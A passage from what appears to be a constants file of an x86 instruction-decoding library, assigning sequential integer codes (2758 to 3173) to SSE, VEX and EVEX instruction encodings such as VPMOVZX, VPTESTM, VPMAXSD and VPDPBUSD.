VEX_VPMOVSXWD_YMM_XMMM128: int = 2758
EVEX_VPMOVSXWD_XMM_K1Z_XMMM64: int = 2759
EVEX_VPMOVSXWD_YMM_K1Z_XMMM128: int = 2760
EVEX_VPMOVSXWD_ZMM_K1Z_YMMM256: int = 2761
EVEX_VPMOVSDW_XMMM64_K1Z_XMM: int = 2762
EVEX_VPMOVSDW_XMMM128_K1Z_YMM: int = 2763
EVEX_VPMOVSDW_YMMM256_K1Z_ZMM: int = 2764
PMOVSXWQ_XMM_XMMM32: int = 2765
VEX_VPMOVSXWQ_XMM_XMMM32: int = 2766
VEX_VPMOVSXWQ_YMM_XMMM64: int = 2767
EVEX_VPMOVSXWQ_XMM_K1Z_XMMM32: int = 2768
EVEX_VPMOVSXWQ_YMM_K1Z_XMMM64: int = 2769
EVEX_VPMOVSXWQ_ZMM_K1Z_XMMM128: int = 2770
EVEX_VPMOVSQW_XMMM32_K1Z_XMM: int = 2771
EVEX_VPMOVSQW_XMMM64_K1Z_YMM: int = 2772
EVEX_VPMOVSQW_XMMM128_K1Z_ZMM: int = 2773
PMOVSXDQ_XMM_XMMM64: int = 2774
VEX_VPMOVSXDQ_XMM_XMMM64: int = 2775
VEX_VPMOVSXDQ_YMM_XMMM128: int = 2776
EVEX_VPMOVSXDQ_XMM_K1Z_XMMM64: int = 2777
EVEX_VPMOVSXDQ_YMM_K1Z_XMMM128: int = 2778
EVEX_VPMOVSXDQ_ZMM_K1Z_YMMM256: int = 2779
EVEX_VPMOVSQD_XMMM64_K1Z_XMM: int = 2780
EVEX_VPMOVSQD_XMMM128_K1Z_YMM: int = 2781
EVEX_VPMOVSQD_YMMM256_K1Z_ZMM: int = 2782
EVEX_VPTESTMB_KR_K1_XMM_XMMM128: int = 2783
EVEX_VPTESTMB_KR_K1_YMM_YMMM256: int = 2784
EVEX_VPTESTMB_KR_K1_ZMM_ZMMM512: int = 2785
EVEX_VPTESTMW_KR_K1_XMM_XMMM128: int = 2786
EVEX_VPTESTMW_KR_K1_YMM_YMMM256: int = 2787
EVEX_VPTESTMW_KR_K1_ZMM_ZMMM512: int = 2788
EVEX_VPTESTNMB_KR_K1_XMM_XMMM128: int = 2789
EVEX_VPTESTNMB_KR_K1_YMM_YMMM256: int = 2790
EVEX_VPTESTNMB_KR_K1_ZMM_ZMMM512: int = 2791
EVEX_VPTESTNMW_KR_K1_XMM_XMMM128: int = 2792
EVEX_VPTESTNMW_KR_K1_YMM_YMMM256: int = 2793
EVEX_VPTESTNMW_KR_K1_ZMM_ZMMM512: int = 2794
EVEX_VPTESTMD_KR_K1_XMM_XMMM128B32: int = 2795
EVEX_VPTESTMD_KR_K1_YMM_YMMM256B32: int = 2796
EVEX_VPTESTMD_KR_K1_ZMM_ZMMM512B32: int = 2797
EVEX_VPTESTMQ_KR_K1_XMM_XMMM128B64: int = 2798
EVEX_VPTESTMQ_KR_K1_YMM_YMMM256B64: int = 2799
EVEX_VPTESTMQ_KR_K1_ZMM_ZMMM512B64: int = 2800
EVEX_VPTESTNMD_KR_K1_XMM_XMMM128B32: int = 2801
EVEX_VPTESTNMD_KR_K1_YMM_YMMM256B32: int = 2802
EVEX_VPTESTNMD_KR_K1_ZMM_ZMMM512B32: int = 2803
EVEX_VPTESTNMQ_KR_K1_XMM_XMMM128B64: int = 2804
EVEX_VPTESTNMQ_KR_K1_YMM_YMMM256B64: int = 2805
EVEX_VPTESTNMQ_KR_K1_ZMM_ZMMM512B64: int = 2806
PMULDQ_XMM_XMMM128: int = 2807
VEX_VPMULDQ_XMM_XMM_XMMM128: int = 2808
VEX_VPMULDQ_YMM_YMM_YMMM256: int = 2809
EVEX_VPMULDQ_XMM_K1Z_XMM_XMMM128B64: int = 2810
EVEX_VPMULDQ_YMM_K1Z_YMM_YMMM256B64: int = 2811
EVEX_VPMULDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2812
EVEX_VPMOVM2B_XMM_KR: int = 2813
EVEX_VPMOVM2B_YMM_KR: int = 2814
EVEX_VPMOVM2B_ZMM_KR: int = 2815
EVEX_VPMOVM2W_XMM_KR: int = 2816
EVEX_VPMOVM2W_YMM_KR: int = 2817
EVEX_VPMOVM2W_ZMM_KR: int = 2818
PCMPEQQ_XMM_XMMM128: int = 2819
VEX_VPCMPEQQ_XMM_XMM_XMMM128: int = 2820
VEX_VPCMPEQQ_YMM_YMM_YMMM256: int = 2821
EVEX_VPCMPEQQ_KR_K1_XMM_XMMM128B64: int = 2822
EVEX_VPCMPEQQ_KR_K1_YMM_YMMM256B64: int = 2823
EVEX_VPCMPEQQ_KR_K1_ZMM_ZMMM512B64: int = 2824
EVEX_VPMOVB2M_KR_XMM: int = 2825
EVEX_VPMOVB2M_KR_YMM: int = 2826
EVEX_VPMOVB2M_KR_ZMM: int = 2827
EVEX_VPMOVW2M_KR_XMM: int = 2828
EVEX_VPMOVW2M_KR_YMM: int = 2829
EVEX_VPMOVW2M_KR_ZMM: int = 2830
MOVNTDQA_XMM_M128: int = 2831
VEX_VMOVNTDQA_XMM_M128: int = 2832
VEX_VMOVNTDQA_YMM_M256: int = 2833
EVEX_VMOVNTDQA_XMM_M128: int = 2834
EVEX_VMOVNTDQA_YMM_M256: int = 2835
EVEX_VMOVNTDQA_ZMM_M512: int = 2836
EVEX_VPBROADCASTMB2Q_XMM_KR: int = 2837
EVEX_VPBROADCASTMB2Q_YMM_KR: int = 2838
EVEX_VPBROADCASTMB2Q_ZMM_KR: int = 2839
PACKUSDW_XMM_XMMM128: int = 2840
VEX_VPACKUSDW_XMM_XMM_XMMM128: int = 2841
VEX_VPACKUSDW_YMM_YMM_YMMM256: int = 2842
EVEX_VPACKUSDW_XMM_K1Z_XMM_XMMM128B32: int = 2843
EVEX_VPACKUSDW_YMM_K1Z_YMM_YMMM256B32: int = 2844
EVEX_VPACKUSDW_ZMM_K1Z_ZMM_ZMMM512B32: int = 2845
VEX_VMASKMOVPS_XMM_XMM_M128: int = 2846
VEX_VMASKMOVPS_YMM_YMM_M256: int = 2847
EVEX_VSCALEFPS_XMM_K1Z_XMM_XMMM128B32: int = 2848
EVEX_VSCALEFPS_YMM_K1Z_YMM_YMMM256B32: int = 2849
EVEX_VSCALEFPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 2850
EVEX_VSCALEFPD_XMM_K1Z_XMM_XMMM128B64: int = 2851
EVEX_VSCALEFPD_YMM_K1Z_YMM_YMMM256B64: int = 2852
EVEX_VSCALEFPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 2853
VEX_VMASKMOVPD_XMM_XMM_M128: int = 2854
VEX_VMASKMOVPD_YMM_YMM_M256: int = 2855
EVEX_VSCALEFSS_XMM_K1Z_XMM_XMMM32_ER: int = 2856
EVEX_VSCALEFSD_XMM_K1Z_XMM_XMMM64_ER: int = 2857
VEX_VMASKMOVPS_M128_XMM_XMM: int = 2858
VEX_VMASKMOVPS_M256_YMM_YMM: int = 2859
VEX_VMASKMOVPD_M128_XMM_XMM: int = 2860
VEX_VMASKMOVPD_M256_YMM_YMM: int = 2861
PMOVZXBW_XMM_XMMM64: int = 2862
VEX_VPMOVZXBW_XMM_XMMM64: int = 2863
VEX_VPMOVZXBW_YMM_XMMM128: int = 2864
EVEX_VPMOVZXBW_XMM_K1Z_XMMM64: int = 2865
EVEX_VPMOVZXBW_YMM_K1Z_XMMM128: int = 2866
EVEX_VPMOVZXBW_ZMM_K1Z_YMMM256: int = 2867
EVEX_VPMOVWB_XMMM64_K1Z_XMM: int = 2868
EVEX_VPMOVWB_XMMM128_K1Z_YMM: int = 2869
EVEX_VPMOVWB_YMMM256_K1Z_ZMM: int = 2870
PMOVZXBD_XMM_XMMM32: int = 2871
VEX_VPMOVZXBD_XMM_XMMM32: int = 2872
VEX_VPMOVZXBD_YMM_XMMM64: int = 2873
EVEX_VPMOVZXBD_XMM_K1Z_XMMM32: int = 2874
EVEX_VPMOVZXBD_YMM_K1Z_XMMM64: int = 2875
EVEX_VPMOVZXBD_ZMM_K1Z_XMMM128: int = 2876
EVEX_VPMOVDB_XMMM32_K1Z_XMM: int = 2877
EVEX_VPMOVDB_XMMM64_K1Z_YMM: int = 2878
EVEX_VPMOVDB_XMMM128_K1Z_ZMM: int = 2879
PMOVZXBQ_XMM_XMMM16: int = 2880
VEX_VPMOVZXBQ_XMM_XMMM16: int = 2881
VEX_VPMOVZXBQ_YMM_XMMM32: int = 2882
EVEX_VPMOVZXBQ_XMM_K1Z_XMMM16: int = 2883
EVEX_VPMOVZXBQ_YMM_K1Z_XMMM32: int = 2884
EVEX_VPMOVZXBQ_ZMM_K1Z_XMMM64: int = 2885
EVEX_VPMOVQB_XMMM16_K1Z_XMM: int = 2886
EVEX_VPMOVQB_XMMM32_K1Z_YMM: int = 2887
EVEX_VPMOVQB_XMMM64_K1Z_ZMM: int = 2888
PMOVZXWD_XMM_XMMM64: int = 2889
VEX_VPMOVZXWD_XMM_XMMM64: int = 2890
VEX_VPMOVZXWD_YMM_XMMM128: int = 2891
EVEX_VPMOVZXWD_XMM_K1Z_XMMM64: int = 2892
EVEX_VPMOVZXWD_YMM_K1Z_XMMM128: int = 2893
EVEX_VPMOVZXWD_ZMM_K1Z_YMMM256: int = 2894
EVEX_VPMOVDW_XMMM64_K1Z_XMM: int = 2895
EVEX_VPMOVDW_XMMM128_K1Z_YMM: int = 2896
EVEX_VPMOVDW_YMMM256_K1Z_ZMM: int = 2897
PMOVZXWQ_XMM_XMMM32: int = 2898
VEX_VPMOVZXWQ_XMM_XMMM32: int = 2899
VEX_VPMOVZXWQ_YMM_XMMM64: int = 2900
EVEX_VPMOVZXWQ_XMM_K1Z_XMMM32: int = 2901
EVEX_VPMOVZXWQ_YMM_K1Z_XMMM64: int = 2902
EVEX_VPMOVZXWQ_ZMM_K1Z_XMMM128: int = 2903
EVEX_VPMOVQW_XMMM32_K1Z_XMM: int = 2904
EVEX_VPMOVQW_XMMM64_K1Z_YMM: int = 2905
EVEX_VPMOVQW_XMMM128_K1Z_ZMM: int = 2906
PMOVZXDQ_XMM_XMMM64: int = 2907
VEX_VPMOVZXDQ_XMM_XMMM64: int = 2908
VEX_VPMOVZXDQ_YMM_XMMM128: int = 2909
EVEX_VPMOVZXDQ_XMM_K1Z_XMMM64: int = 2910
EVEX_VPMOVZXDQ_YMM_K1Z_XMMM128: int = 2911
EVEX_VPMOVZXDQ_ZMM_K1Z_YMMM256: int = 2912
EVEX_VPMOVQD_XMMM64_K1Z_XMM: int = 2913
EVEX_VPMOVQD_XMMM128_K1Z_YMM: int = 2914
EVEX_VPMOVQD_YMMM256_K1Z_ZMM: int = 2915
VEX_VPERMD_YMM_YMM_YMMM256: int = 2916
EVEX_VPERMD_YMM_K1Z_YMM_YMMM256B32: int = 2917
EVEX_VPERMD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2918
EVEX_VPERMQ_YMM_K1Z_YMM_YMMM256B64: int = 2919
EVEX_VPERMQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2920
PCMPGTQ_XMM_XMMM128: int = 2921
VEX_VPCMPGTQ_XMM_XMM_XMMM128: int = 2922
VEX_VPCMPGTQ_YMM_YMM_YMMM256: int = 2923
EVEX_VPCMPGTQ_KR_K1_XMM_XMMM128B64: int = 2924
EVEX_VPCMPGTQ_KR_K1_YMM_YMMM256B64: int = 2925
EVEX_VPCMPGTQ_KR_K1_ZMM_ZMMM512B64: int = 2926
PMINSB_XMM_XMMM128: int = 2927
VEX_VPMINSB_XMM_XMM_XMMM128: int = 2928
VEX_VPMINSB_YMM_YMM_YMMM256: int = 2929
EVEX_VPMINSB_XMM_K1Z_XMM_XMMM128: int = 2930
EVEX_VPMINSB_YMM_K1Z_YMM_YMMM256: int = 2931
EVEX_VPMINSB_ZMM_K1Z_ZMM_ZMMM512: int = 2932
EVEX_VPMOVM2D_XMM_KR: int = 2933
EVEX_VPMOVM2D_YMM_KR: int = 2934
EVEX_VPMOVM2D_ZMM_KR: int = 2935
EVEX_VPMOVM2Q_XMM_KR: int = 2936
EVEX_VPMOVM2Q_YMM_KR: int = 2937
EVEX_VPMOVM2Q_ZMM_KR: int = 2938
PMINSD_XMM_XMMM128: int = 2939
VEX_VPMINSD_XMM_XMM_XMMM128: int = 2940
VEX_VPMINSD_YMM_YMM_YMMM256: int = 2941
EVEX_VPMINSD_XMM_K1Z_XMM_XMMM128B32: int = 2942
EVEX_VPMINSD_YMM_K1Z_YMM_YMMM256B32: int = 2943
EVEX_VPMINSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2944
EVEX_VPMINSQ_XMM_K1Z_XMM_XMMM128B64: int = 2945
EVEX_VPMINSQ_YMM_K1Z_YMM_YMMM256B64: int = 2946
EVEX_VPMINSQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2947
EVEX_VPMOVD2M_KR_XMM: int = 2948
EVEX_VPMOVD2M_KR_YMM: int = 2949
EVEX_VPMOVD2M_KR_ZMM: int = 2950
EVEX_VPMOVQ2M_KR_XMM: int = 2951
EVEX_VPMOVQ2M_KR_YMM: int = 2952
EVEX_VPMOVQ2M_KR_ZMM: int = 2953
PMINUW_XMM_XMMM128: int = 2954
VEX_VPMINUW_XMM_XMM_XMMM128: int = 2955
VEX_VPMINUW_YMM_YMM_YMMM256: int = 2956
EVEX_VPMINUW_XMM_K1Z_XMM_XMMM128: int = 2957
EVEX_VPMINUW_YMM_K1Z_YMM_YMMM256: int = 2958
EVEX_VPMINUW_ZMM_K1Z_ZMM_ZMMM512: int = 2959
EVEX_VPBROADCASTMW2D_XMM_KR: int = 2960
EVEX_VPBROADCASTMW2D_YMM_KR: int = 2961
EVEX_VPBROADCASTMW2D_ZMM_KR: int = 2962
PMINUD_XMM_XMMM128: int = 2963
VEX_VPMINUD_XMM_XMM_XMMM128: int = 2964
VEX_VPMINUD_YMM_YMM_YMMM256: int = 2965
EVEX_VPMINUD_XMM_K1Z_XMM_XMMM128B32: int = 2966
EVEX_VPMINUD_YMM_K1Z_YMM_YMMM256B32: int = 2967
EVEX_VPMINUD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2968
EVEX_VPMINUQ_XMM_K1Z_XMM_XMMM128B64: int = 2969
EVEX_VPMINUQ_YMM_K1Z_YMM_YMMM256B64: int = 2970
EVEX_VPMINUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2971
PMAXSB_XMM_XMMM128: int = 2972
VEX_VPMAXSB_XMM_XMM_XMMM128: int = 2973
VEX_VPMAXSB_YMM_YMM_YMMM256: int = 2974
EVEX_VPMAXSB_XMM_K1Z_XMM_XMMM128: int = 2975
EVEX_VPMAXSB_YMM_K1Z_YMM_YMMM256: int = 2976
EVEX_VPMAXSB_ZMM_K1Z_ZMM_ZMMM512: int = 2977
PMAXSD_XMM_XMMM128: int = 2978
VEX_VPMAXSD_XMM_XMM_XMMM128: int = 2979
VEX_VPMAXSD_YMM_YMM_YMMM256: int = 2980
EVEX_VPMAXSD_XMM_K1Z_XMM_XMMM128B32: int = 2981
EVEX_VPMAXSD_YMM_K1Z_YMM_YMMM256B32: int = 2982
EVEX_VPMAXSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2983
EVEX_VPMAXSQ_XMM_K1Z_XMM_XMMM128B64: int = 2984
EVEX_VPMAXSQ_YMM_K1Z_YMM_YMMM256B64: int = 2985
EVEX_VPMAXSQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2986
PMAXUW_XMM_XMMM128: int = 2987
VEX_VPMAXUW_XMM_XMM_XMMM128: int = 2988
VEX_VPMAXUW_YMM_YMM_YMMM256: int = 2989
EVEX_VPMAXUW_XMM_K1Z_XMM_XMMM128: int = 2990
EVEX_VPMAXUW_YMM_K1Z_YMM_YMMM256: int = 2991
EVEX_VPMAXUW_ZMM_K1Z_ZMM_ZMMM512: int = 2992
PMAXUD_XMM_XMMM128: int = 2993
VEX_VPMAXUD_XMM_XMM_XMMM128: int = 2994
VEX_VPMAXUD_YMM_YMM_YMMM256: int = 2995
EVEX_VPMAXUD_XMM_K1Z_XMM_XMMM128B32: int = 2996
EVEX_VPMAXUD_YMM_K1Z_YMM_YMMM256B32: int = 2997
EVEX_VPMAXUD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2998
EVEX_VPMAXUQ_XMM_K1Z_XMM_XMMM128B64: int = 2999
EVEX_VPMAXUQ_YMM_K1Z_YMM_YMMM256B64: int = 3000
EVEX_VPMAXUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3001
PMULLD_XMM_XMMM128: int = 3002
VEX_VPMULLD_XMM_XMM_XMMM128: int = 3003
VEX_VPMULLD_YMM_YMM_YMMM256: int = 3004
EVEX_VPMULLD_XMM_K1Z_XMM_XMMM128B32: int = 3005
EVEX_VPMULLD_YMM_K1Z_YMM_YMMM256B32: int = 3006
EVEX_VPMULLD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3007
EVEX_VPMULLQ_XMM_K1Z_XMM_XMMM128B64: int = 3008
EVEX_VPMULLQ_YMM_K1Z_YMM_YMMM256B64: int = 3009
EVEX_VPMULLQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3010
PHMINPOSUW_XMM_XMMM128: int = 3011
VEX_VPHMINPOSUW_XMM_XMMM128: int = 3012
EVEX_VGETEXPPS_XMM_K1Z_XMMM128B32: int = 3013
EVEX_VGETEXPPS_YMM_K1Z_YMMM256B32: int = 3014
EVEX_VGETEXPPS_ZMM_K1Z_ZMMM512B32_SAE: int = 3015
EVEX_VGETEXPPD_XMM_K1Z_XMMM128B64: int = 3016
EVEX_VGETEXPPD_YMM_K1Z_YMMM256B64: int = 3017
EVEX_VGETEXPPD_ZMM_K1Z_ZMMM512B64_SAE: int = 3018
EVEX_VGETEXPSS_XMM_K1Z_XMM_XMMM32_SAE: int = 3019
EVEX_VGETEXPSD_XMM_K1Z_XMM_XMMM64_SAE: int = 3020
EVEX_VPLZCNTD_XMM_K1Z_XMMM128B32: int = 3021
EVEX_VPLZCNTD_YMM_K1Z_YMMM256B32: int = 3022
EVEX_VPLZCNTD_ZMM_K1Z_ZMMM512B32: int = 3023
EVEX_VPLZCNTQ_XMM_K1Z_XMMM128B64: int = 3024
EVEX_VPLZCNTQ_YMM_K1Z_YMMM256B64: int = 3025
EVEX_VPLZCNTQ_ZMM_K1Z_ZMMM512B64: int = 3026
VEX_VPSRLVD_XMM_XMM_XMMM128: int = 3027
VEX_VPSRLVD_YMM_YMM_YMMM256: int = 3028
VEX_VPSRLVQ_XMM_XMM_XMMM128: int = 3029
VEX_VPSRLVQ_YMM_YMM_YMMM256: int = 3030
EVEX_VPSRLVD_XMM_K1Z_XMM_XMMM128B32: int = 3031
EVEX_VPSRLVD_YMM_K1Z_YMM_YMMM256B32: int = 3032
EVEX_VPSRLVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3033
EVEX_VPSRLVQ_XMM_K1Z_XMM_XMMM128B64: int = 3034
EVEX_VPSRLVQ_YMM_K1Z_YMM_YMMM256B64: int = 3035
EVEX_VPSRLVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3036
VEX_VPSRAVD_XMM_XMM_XMMM128: int = 3037
VEX_VPSRAVD_YMM_YMM_YMMM256: int = 3038
EVEX_VPSRAVD_XMM_K1Z_XMM_XMMM128B32: int = 3039
EVEX_VPSRAVD_YMM_K1Z_YMM_YMMM256B32: int = 3040
EVEX_VPSRAVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3041
EVEX_VPSRAVQ_XMM_K1Z_XMM_XMMM128B64: int = 3042
EVEX_VPSRAVQ_YMM_K1Z_YMM_YMMM256B64: int = 3043
EVEX_VPSRAVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3044
VEX_VPSLLVD_XMM_XMM_XMMM128: int = 3045
VEX_VPSLLVD_YMM_YMM_YMMM256: int = 3046
VEX_VPSLLVQ_XMM_XMM_XMMM128: int = 3047
VEX_VPSLLVQ_YMM_YMM_YMMM256: int = 3048
EVEX_VPSLLVD_XMM_K1Z_XMM_XMMM128B32: int = 3049
EVEX_VPSLLVD_YMM_K1Z_YMM_YMMM256B32: int = 3050
EVEX_VPSLLVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3051
EVEX_VPSLLVQ_XMM_K1Z_XMM_XMMM128B64: int = 3052
EVEX_VPSLLVQ_YMM_K1Z_YMM_YMMM256B64: int = 3053
EVEX_VPSLLVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3054
EVEX_VRCP14PS_XMM_K1Z_XMMM128B32: int = 3055
EVEX_VRCP14PS_YMM_K1Z_YMMM256B32: int = 3056
EVEX_VRCP14PS_ZMM_K1Z_ZMMM512B32: int = 3057
EVEX_VRCP14PD_XMM_K1Z_XMMM128B64: int = 3058
EVEX_VRCP14PD_YMM_K1Z_YMMM256B64: int = 3059
EVEX_VRCP14PD_ZMM_K1Z_ZMMM512B64: int = 3060
EVEX_VRCP14SS_XMM_K1Z_XMM_XMMM32: int = 3061
EVEX_VRCP14SD_XMM_K1Z_XMM_XMMM64: int = 3062
EVEX_VRSQRT14PS_XMM_K1Z_XMMM128B32: int = 3063
EVEX_VRSQRT14PS_YMM_K1Z_YMMM256B32: int = 3064
EVEX_VRSQRT14PS_ZMM_K1Z_ZMMM512B32: int = 3065
EVEX_VRSQRT14PD_XMM_K1Z_XMMM128B64: int = 3066
EVEX_VRSQRT14PD_YMM_K1Z_YMMM256B64: int = 3067
EVEX_VRSQRT14PD_ZMM_K1Z_ZMMM512B64: int = 3068
EVEX_VRSQRT14SS_XMM_K1Z_XMM_XMMM32: int = 3069
EVEX_VRSQRT14SD_XMM_K1Z_XMM_XMMM64: int = 3070
EVEX_VPDPBUSD_XMM_K1Z_XMM_XMMM128B32: int = 3071
EVEX_VPDPBUSD_YMM_K1Z_YMM_YMMM256B32: int = 3072
EVEX_VPDPBUSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3073
EVEX_VPDPBUSDS_XMM_K1Z_XMM_XMMM128B32: int = 3074
EVEX_VPDPBUSDS_YMM_K1Z_YMM_YMMM256B32: int = 3075
EVEX_VPDPBUSDS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3076
EVEX_VPDPWSSD_XMM_K1Z_XMM_XMMM128B32: int = 3077
EVEX_VPDPWSSD_YMM_K1Z_YMM_YMMM256B32: int = 3078
EVEX_VPDPWSSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3079
EVEX_VDPBF16PS_XMM_K1Z_XMM_XMMM128B32: int = 3080
EVEX_VDPBF16PS_YMM_K1Z_YMM_YMMM256B32: int = 3081
EVEX_VDPBF16PS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3082
EVEX_VP4DPWSSD_ZMM_K1Z_ZMMP3_M128: int = 3083
EVEX_VPDPWSSDS_XMM_K1Z_XMM_XMMM128B32: int = 3084
EVEX_VPDPWSSDS_YMM_K1Z_YMM_YMMM256B32: int = 3085
EVEX_VPDPWSSDS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3086
EVEX_VP4DPWSSDS_ZMM_K1Z_ZMMP3_M128: int = 3087
EVEX_VPOPCNTB_XMM_K1Z_XMMM128: int = 3088
EVEX_VPOPCNTB_YMM_K1Z_YMMM256: int = 3089
EVEX_VPOPCNTB_ZMM_K1Z_ZMMM512: int = 3090
EVEX_VPOPCNTW_XMM_K1Z_XMMM128: int = 3091
EVEX_VPOPCNTW_YMM_K1Z_YMMM256: int = 3092
EVEX_VPOPCNTW_ZMM_K1Z_ZMMM512: int = 3093
EVEX_VPOPCNTD_XMM_K1Z_XMMM128B32: int = 3094
EVEX_VPOPCNTD_YMM_K1Z_YMMM256B32: int = 3095
EVEX_VPOPCNTD_ZMM_K1Z_ZMMM512B32: int = 3096
EVEX_VPOPCNTQ_XMM_K1Z_XMMM128B64: int = 3097
EVEX_VPOPCNTQ_YMM_K1Z_YMMM256B64: int = 3098
EVEX_VPOPCNTQ_ZMM_K1Z_ZMMM512B64: int = 3099
VEX_VPBROADCASTD_XMM_XMMM32: int = 3100
VEX_VPBROADCASTD_YMM_XMMM32: int = 3101
EVEX_VPBROADCASTD_XMM_K1Z_XMMM32: int = 3102
EVEX_VPBROADCASTD_YMM_K1Z_XMMM32: int = 3103
EVEX_VPBROADCASTD_ZMM_K1Z_XMMM32: int = 3104
VEX_VPBROADCASTQ_XMM_XMMM64: int = 3105
VEX_VPBROADCASTQ_YMM_XMMM64: int = 3106
EVEX_VBROADCASTI32X2_XMM_K1Z_XMMM64: int = 3107
EVEX_VBROADCASTI32X2_YMM_K1Z_XMMM64: int = 3108
EVEX_VBROADCASTI32X2_ZMM_K1Z_XMMM64: int = 3109
EVEX_VPBROADCASTQ_XMM_K1Z_XMMM64: int = 3110
EVEX_VPBROADCASTQ_YMM_K1Z_XMMM64: int = 3111
EVEX_VPBROADCASTQ_ZMM_K1Z_XMMM64: int = 3112
VEX_VBROADCASTI128_YMM_M128: int = 3113
EVEX_VBROADCASTI32X4_YMM_K1Z_M128: int = 3114
EVEX_VBROADCASTI32X4_ZMM_K1Z_M128: int = 3115
EVEX_VBROADCASTI64X2_YMM_K1Z_M128: int = 3116
EVEX_VBROADCASTI64X2_ZMM_K1Z_M128: int = 3117
EVEX_VBROADCASTI32X8_ZMM_K1Z_M256: int = 3118
EVEX_VBROADCASTI64X4_ZMM_K1Z_M256: int = 3119
EVEX_VPEXPANDB_XMM_K1Z_XMMM128: int = 3120
EVEX_VPEXPANDB_YMM_K1Z_YMMM256: int = 3121
EVEX_VPEXPANDB_ZMM_K1Z_ZMMM512: int = 3122
EVEX_VPEXPANDW_XMM_K1Z_XMMM128: int = 3123
EVEX_VPEXPANDW_YMM_K1Z_YMMM256: int = 3124
EVEX_VPEXPANDW_ZMM_K1Z_ZMMM512: int = 3125
EVEX_VPCOMPRESSB_XMMM128_K1Z_XMM: int = 3126
EVEX_VPCOMPRESSB_YMMM256_K1Z_YMM: int = 3127
EVEX_VPCOMPRESSB_ZMMM512_K1Z_ZMM: int = 3128
EVEX_VPCOMPRESSW_XMMM128_K1Z_XMM: int = 3129
EVEX_VPCOMPRESSW_YMMM256_K1Z_YMM: int = 3130
EVEX_VPCOMPRESSW_ZMMM512_K1Z_ZMM: int = 3131
EVEX_VPBLENDMD_XMM_K1Z_XMM_XMMM128B32: int = 3132
EVEX_VPBLENDMD_YMM_K1Z_YMM_YMMM256B32: int = 3133
EVEX_VPBLENDMD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3134
EVEX_VPBLENDMQ_XMM_K1Z_XMM_XMMM128B64: int = 3135
EVEX_VPBLENDMQ_YMM_K1Z_YMM_YMMM256B64: int = 3136
EVEX_VPBLENDMQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3137
EVEX_VBLENDMPS_XMM_K1Z_XMM_XMMM128B32: int = 3138
EVEX_VBLENDMPS_YMM_K1Z_YMM_YMMM256B32: int = 3139
EVEX_VBLENDMPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3140
EVEX_VBLENDMPD_XMM_K1Z_XMM_XMMM128B64: int = 3141
EVEX_VBLENDMPD_YMM_K1Z_YMM_YMMM256B64: int = 3142
EVEX_VBLENDMPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 3143
EVEX_VPBLENDMB_XMM_K1Z_XMM_XMMM128: int = 3144
EVEX_VPBLENDMB_YMM_K1Z_YMM_YMMM256: int = 3145
EVEX_VPBLENDMB_ZMM_K1Z_ZMM_ZMMM512: int = 3146
EVEX_VPBLENDMW_XMM_K1Z_XMM_XMMM128: int = 3147
EVEX_VPBLENDMW_YMM_K1Z_YMM_YMMM256: int = 3148
EVEX_VPBLENDMW_ZMM_K1Z_ZMM_ZMMM512: int = 3149
EVEX_VP2INTERSECTD_KP1_XMM_XMMM128B32: int = 3150
EVEX_VP2INTERSECTD_KP1_YMM_YMMM256B32: int = 3151
EVEX_VP2INTERSECTD_KP1_ZMM_ZMMM512B32: int = 3152
EVEX_VP2INTERSECTQ_KP1_XMM_XMMM128B64: int = 3153
EVEX_VP2INTERSECTQ_KP1_YMM_YMMM256B64: int = 3154
EVEX_VP2INTERSECTQ_KP1_ZMM_ZMMM512B64: int = 3155
EVEX_VPSHLDVW_XMM_K1Z_XMM_XMMM128: int = 3156
EVEX_VPSHLDVW_YMM_K1Z_YMM_YMMM256: int = 3157
EVEX_VPSHLDVW_ZMM_K1Z_ZMM_ZMMM512: int = 3158
EVEX_VPSHLDVD_XMM_K1Z_XMM_XMMM128B32: int = 3159
EVEX_VPSHLDVD_YMM_K1Z_YMM_YMMM256B32: int = 3160
EVEX_VPSHLDVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3161
EVEX_VPSHLDVQ_XMM_K1Z_XMM_XMMM128B64: int = 3162
EVEX_VPSHLDVQ_YMM_K1Z_YMM_YMMM256B64: int = 3163
EVEX_VPSHLDVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3164
EVEX_VPSHRDVW_XMM_K1Z_XMM_XMMM128: int = 3165
EVEX_VPSHRDVW_YMM_K1Z_YMM_YMMM256: int = 3166
EVEX_VPSHRDVW_ZMM_K1Z_ZMM_ZMMM512: int = 3167
EVEX_VCVTNEPS2BF16_XMM_K1Z_XMMM128B32: int = 3168
EVEX_VCVTNEPS2BF16_XMM_K1Z_YMMM256B32: int = 3169
EVEX_VCVTNEPS2BF16_YMM_K1Z_ZMMM512B32: int = 3170
EVEX_VCVTNE2PS2BF16_XMM_K1Z_XMM_XMMM128B32: int = 3171
EVEX_VCVTNE2PS2BF16_YMM_K1Z_YMM_YMMM256B32: int = 3172
EVEX_VCVTNE2PS2BF16_ZMM_K1Z_ZMM_ZMMM512B32: int = 3173
